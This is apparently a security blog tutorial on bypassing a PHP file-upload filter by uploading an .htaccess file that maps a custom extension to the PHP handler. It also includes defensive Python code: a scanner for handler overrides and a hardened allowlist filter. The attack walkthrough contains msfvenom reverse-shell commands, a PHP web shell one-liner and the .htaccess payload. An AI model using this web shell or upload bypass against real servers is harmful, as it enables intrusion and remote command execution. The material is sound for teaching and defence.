Apache is one of the most popular HTTP servers today. It hosts hundreds of thousands of applications, most of them written in PHP. In this post I will show how a PHP file upload filter can be bypassed through MIME-type configuration changes.
This short directive,
AddType application/x-httpd-php .html
or, depending on the httpd version,
AddHandler application/x-httpd-php5 .html
tells httpd to treat files with the .html extension as application/x-httpd-php. This way, .php, .html or any other page type containing PHP script is handed to the PHP handler and executed when the page is served to the browser. You can also put the above line in a .htaccess file in the directory where you want PHP scripts embedded in any page type to run.
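A defender-side check for this setting, added here as an example and not part of the original post: the scanner below reads Apache configuration or .htaccess text and reports every AddType, AddHandler, SetHandler or ForceType directive that binds a file extension other than the expected PHP ones to a PHP handler. The handler-name patterns, the expected-extension set and the sample .htaccess content are assumptions chosen for the example; adjust them to your own server.

```python
import re
from pathlib import Path
from typing import List, Tuple

# Handler / MIME names that cause httpd to run a file through PHP. These are
# the common mod_php and php-fpm spellings; the list is an assumption for the
# example and should be extended to match your own configuration.
PHP_HANDLER_PATTERNS = [
    re.compile(r"application/x-httpd-php\d*", re.IGNORECASE),
    re.compile(r"\bphp\d*-script\b", re.IGNORECASE),
    re.compile(r"proxy:(?:unix:|fcgi:)", re.IGNORECASE),
]

# Directives that can bind an extension (or a whole scope) to a handler.
DIRECTIVE_RE = re.compile(
    r"^\s*(AddType|AddHandler|SetHandler|ForceType)\s+(.*?)\s*$", re.IGNORECASE
)

# Extensions you expect to execute as PHP on this site (assumption for the example).
EXPECTED_PHP_EXTENSIONS = {".php", ".phtml"}


def _normalise_ext(token: str) -> str:
    # Apache accepts extensions with or without a leading dot, case-insensitively.
    token = token.lower()
    return token if token.startswith(".") else "." + token


def find_php_handler_overrides(config_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_number, directive, extensions) for every directive in
    config_text that maps something outside EXPECTED_PHP_EXTENSIONS to PHP.
    SetHandler/ForceType take no extension list, so they are reported with
    ['*']: everything in their enclosing <Directory>/<Files> scope is affected."""
    findings = []
    for number, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.split("#", 1)[0]          # drop trailing comments
        match = DIRECTIVE_RE.match(line)
        if not match:
            continue
        directive, rest = match.group(1), match.group(2)
        if not any(p.search(rest) for p in PHP_HANDLER_PATTERNS):
            continue                          # maps to something other than PHP
        if directive.lower() in ("sethandler", "forcetype"):
            findings.append((number, directive, ["*"]))
            continue
        # AddType/AddHandler: first token is the type or handler, the rest are extensions
        extensions = [_normalise_ext(t) for t in rest.split()[1:]]
        unexpected = [e for e in extensions if e not in EXPECTED_PHP_EXTENSIONS]
        if unexpected:
            findings.append((number, directive, unexpected))
    return findings


def scan_htaccess_files(document_root: str) -> List[Tuple[str, int, str, List[str]]]:
    """Walk document_root and run the check over every .htaccess found,
    returning (path, line_number, directive, extensions) tuples."""
    results = []
    for htaccess in Path(document_root).rglob(".htaccess"):
        text = htaccess.read_text(errors="replace")
        for number, directive, exts in find_php_handler_overrides(text):
            results.append((str(htaccess), number, directive, exts))
    return results


# Constructed sample .htaccess for the example (not taken from a real server).
SAMPLE_HTACCESS = """\
# legitimate entries
AddType image/png .png
AddType application/x-httpd-php .php
# entries a scanner should flag
AddType application/x-httpd-php .cybertech
AddHandler application/x-httpd-php5 html htm
"""

if __name__ == "__main__":
    for number, directive, exts in find_php_handler_overrides(SAMPLE_HTACCESS):
        print(f"line {number}: {directive} maps {', '.join(exts)} to PHP")
```

Run scan_htaccess_files("/var/www/html") from a cron or file-integrity job: a freshly written .htaccess that binds a new extension to PHP is exactly the kind of change worth alerting on. httpd only honours .htaccess where AllowOverride permits it, so the scanner complements a restrictive AllowOverride rather than replacing it.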
Let’s see how an attacker may use that vulnerability to get into a server.
File upload functionality is one of the most common ways to deliver and share content across the internet. To prevent uploading malicious content, developers use filters to accept only specific file types and reject executable content like .exe, .ps1, .sh, etc.
To see how the vulnerability works, I will use an AWS t3.micro EC2 instance. When creating the VM, I specify a user-data script that installs and runs a simple Apache server:
#!/bin/bash
yum update -y
# install httpd and PHP
yum install -y httpd.x86_64
yum install -y php
# start httpd now and on every boot
systemctl start httpd.service
systemctl enable httpd.service
# fetch the demo file uploader into the document root
wget -q https://github.com/cybertechtalk/php-file-uploader/blob/main/index.php?raw=true -O /var/www/html/index.php
Before we start, check that the security group allows TCP connections on port 80:
Now open http://<ec2-public-ip>/index.php. Here we go, our file uploader is up and ready to be hacked:
So, first let’s check whether we can upload a *.php reverse shell directly to the machine. Create the shell with msfvenom (see my previous post on how to create a simple reverse shell with msfvenom):
$ msfvenom -p php/reverse_php LHOST=<attacker-ip> LPORT=8888 -f raw > shell.php
And try to upload it:
If you look at the code available on my GitHub, you will find a filter that allows only specific file types to be uploaded. So let’s adjust our malicious script by changing the file extension. Create a very simple PHP one-liner:
<?php
$command = $_GET['cmd'];
echo exec($command);
?>
or a reverse shell:
$ msfvenom -p php/reverse_php LHOST=<attacker-ip> LPORT=8888 -f raw > shell.cybertech
and upload it one more time:
Nice, now browse to http://<ec2-public-ip>/shell.cybertech:
Not exactly what we expected to see. Now we have to force Apache (httpd) to interpret the *.cybertech file as a PHP application and run it. To do so, let’s create a simple .htaccess directive:
$ echo "AddType application/x-httpd-php .cybertech" > .htaccess
Set AllowOverride to All for /var/www/html in /etc/httpd/conf/httpd.conf and upload the .htaccess file to the root folder:
Fine! Now open http://<ec2-public-ip>/shell.cybertech again and try ?cmd=whoami:
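The upload filter is the other place to close this off. The following Python is an added example, not the uploader from the post's GitHub repository: weak_filter_accepts mirrors the blocklist style of check that both a renamed shell and a .htaccess file slip past, and hardened_filter shows the allowlist policy that rejects them. The allowed extension set, the name pattern and the sample filenames are assumptions for the example.

```python
import os
import re
import secrets
from typing import Optional

# A blocklist of "dangerous" extensions: the style of filter the post bypasses.
WEAK_BLOCKLIST = {".php", ".phtml", ".exe", ".ps1", ".sh"}

# Hardened policy: only the types the application actually needs (assumption for the example).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}
SAFE_STEM_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")


def weak_filter_accepts(filename: str) -> bool:
    """Accepts anything whose extension is not on the blocklist, so
    'shell.cybertech' and '.htaccess' both pass."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in WEAK_BLOCKLIST


def hardened_filter(filename: str) -> Optional[str]:
    """Return the name to store the upload under, or None to reject it.
    - strips any directory part, so '../x.png' cannot escape the upload dir
    - rejects dotfiles: .htaccess and .user.ini are configuration, not content
    - allowlists extensions instead of blocklisting them
    - rejects double extensions such as 'shell.php.png'
    - replaces the client-chosen name with a random one, so the client never
      controls what the web server sees on disk"""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return None
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    if "." in stem or not SAFE_STEM_RE.match(stem):
        return None
    return secrets.token_hex(16) + ext


# Constructed sample filenames for the example.
SAMPLE_UPLOADS = [
    "photo.png", "shell.php", "shell.cybertech",
    ".htaccess", "shell.php.png", "../photo.png",
]

if __name__ == "__main__":
    for name in SAMPLE_UPLOADS:
        print(f"{name:16} weak={weak_filter_accepts(name)!s:5} hardened={hardened_filter(name)}")
```

Even with this filter in place, keep the upload directory outside the DocumentRoot or disable PHP for it (AllowOverride None plus php_admin_flag engine off in the matching <Directory> block when using mod_php), because the bypass in this post only works where httpd honours an uploaded .htaccess.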
In this example, I showed you a simple way to bypass a restricted PHP file uploader by leveraging the httpd handler directive AddType application/x-httpd-php. For more interesting content, please keep an eye on the CyberTechTalk blog or like the post below.
Have a good day, be ethical,
and protect your privacy!